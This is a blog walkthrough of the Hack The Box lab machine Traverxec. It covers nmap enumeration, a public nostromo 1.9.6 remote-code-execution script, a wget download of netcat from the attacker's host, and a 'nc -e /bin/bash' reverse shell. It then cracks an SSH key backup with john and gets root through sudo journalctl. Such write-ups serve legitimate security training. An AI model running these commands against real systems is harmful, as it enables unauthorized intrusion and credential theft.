Hack the box(HTB) Traverxec write up

0
(0)

Commands used

1-nmap -sC -sV -O -v -oA initial 10.10.10.4
2-python getshell.py 10.10.10.165 80 "cd / && mkdir tmp"
3-python getshell.py 10.10.10.165 80 "cd /tmp && wget http://10.10.14.20:8000/nc"
4-python getshell.py 10.10.10.165 80 "/tmp/nc -e /bin/bash 10.10.14.20 4444"
5-cd /home/david/public_www
6-base64 backup-ssh-identity-files.tgz
7-base64 -d file >>new file
8-/usr/share/john/ssh2john.py id_rsa
9-john hash --wordlist=/root/Desktop/rockyou.txt
10-ssh -i id_rsa [email protected]
11-/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
12-!/bin/bash
Hack the box(HTB) Traverxec write up

Steps invloved

1-Enumeration
2-Exploiting nostromo 1.9.6
3-Getting a complete shell
4-Getting id_rsa for User David
5-Getting keyprase for id_rsa
6-Getting user.txt
7-Exploiting journalctl (Getting root.txt)

Enumeration

Nmap scan

Nmap 7.70 scan initiated Thu Apr  9 21:41:24 2020 as: nmap -sC -sV -O -p- -v -oV 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.28s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34 | http-methods: | Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.18 (89%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 45.541 days (since Mon Feb 24 07:47:21 2020)
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Thu Apr 9 21:46:56 2020 -- 1 IP address (1 host up) scanned in 333.39 seconds
Hack the box(HTB) Traverxec write up

The first thing which is very uncommon is the version of the http nostromo

So lets google about it and try to find some exploits of it.

Exploiting nostromo 1.9.6

Hack the box(HTB) Traverxec write up

On the top i got rapid 7 cve hence i used that can copied it my machine as getshell.py.

Hack the box(HTB) Traverxec write up

Getting a complete shell

This is a one line shell so lets first get a full shell.

Through this i uploaded nc to the target and then started reverse shell .

Hack the box(HTB) Traverxec write up

Before executing this make sure you have your python server on.

Hack the box(HTB) Traverxec write up
[email protected]:~/Desktop/htb/traverxec# python getshell.py 10.10.10.165 80 "cd /tmp && chmod +x nc"
Hack the box(HTB) Traverxec write up

Hence now we have a full shell as www user

Getting id_rsa for User David

After a little enumeration i found a conf file

MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin [email protected]
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
LOGS [OPTIONAL]
logpid logs/nhttpd.pid
SETUID [RECOMMENDED]
user www-data
BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
ALIASES [OPTIONAL]
/icons /var/nostromo/icons
HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www

So there is a directory public_www in david so lets check that

cd /home/david/public_www
ls
index.html
protected-file-area
cd protected-file-area
ls
backup-ssh-identity-files.tgz
base64 backup-ssh-identity-files.tgz

Found a backup file lets download it using base64

Hack the box(HTB) Traverxec write up

Then copying that in file and then decoding it.

base64 -d file >>new file

after extracting it i got id_rsa key for david.

Hack the box(HTB) Traverxec write up

Getting keyprase for id_rsa

In order to get the key prase of it .First i had to convert it into hash.Using ssh2john

locate ssh2john

in order to find it in your machine.

Hack the box(HTB) Traverxec write up

Now lets decrypt it using john the ripper.

Hack the box(HTB) Traverxec write up

Getting User.txt

Now Simply login in ssh and get the user flag.

Hack the box(HTB) Traverxec write up

Exploiting journalctl (Getting root.txt)

Now let’s do privilege escalation .

Found a server-stats.sh

Hack the box(HTB) Traverxec write up
 [email protected]:~/bin$ cat server-stats.sh 
!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: /usr/bin/uptime"
echo " "
echo "Open nhttpd sockets: /usr/bin/ss -H sport = 80 | /usr/bin/wc -l"
echo "Files in the docroot: /usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

Used gtfobins for exploiting this binary.

[email protected]:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Thu 2020-04-09 19:07:20 EDT, end at Fri 2020-04-10 00:11:15 EDT. --
Apr 09 19:07:25 traverxec systemd[1]: Started nostromo nhttpd server.
Apr 09 19:19:00 traverxec sudo[760]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=ww
Apr 09 19:19:03 traverxec sudo[760]: pam_unix(sudo:auth): conversation failed
Apr 09 19:19:03 traverxec sudo[760]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 09 19:19:03 traverxec sudo[760]: www-data : command not allowed ; TTY=pts/0 ; PWD=/home/david ; USER=root ; COMMAND=list
!/bin/bash
[email protected]:/home/david/bin# whoami
root
[email protected]:/home/david/bin# cd /
[email protected]:/# ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
[email protected]:/# cd root
[email protected]:~# ls
nostromo_1.9.6-1.deb root.txt
[email protected]:~# cat root.txt
9##################6e0d906
[email protected]:~#

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Leave a Comment

X
wpChatIcon
0 Shares
Tweet
Share
Share
Pin